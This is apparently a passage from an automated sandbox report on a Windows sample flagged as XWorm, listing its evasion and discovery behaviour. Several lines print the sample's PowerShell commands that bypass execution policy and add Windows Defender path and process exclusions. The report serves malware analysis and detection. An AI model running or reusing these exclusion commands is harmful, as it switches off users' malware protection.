              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMemory allocated: 1AC60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeWindow / User API: threadDelayed 9759Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5982Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3830Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5926Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3852Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7122Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2444Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6938
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2785
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe TID: 5448Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep count: 5926 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep count: 3852 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 7122 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep count: 2444 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2950146492.000000001B8A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.Ser%SystemRoot%\system32\mswsock.dlldel.Discovery, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeQueries volume information: C:\Users\user\Desktop\1c8DbXc5r0.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2955625488.000000001C6A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 1c8DbXc5r0.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPE
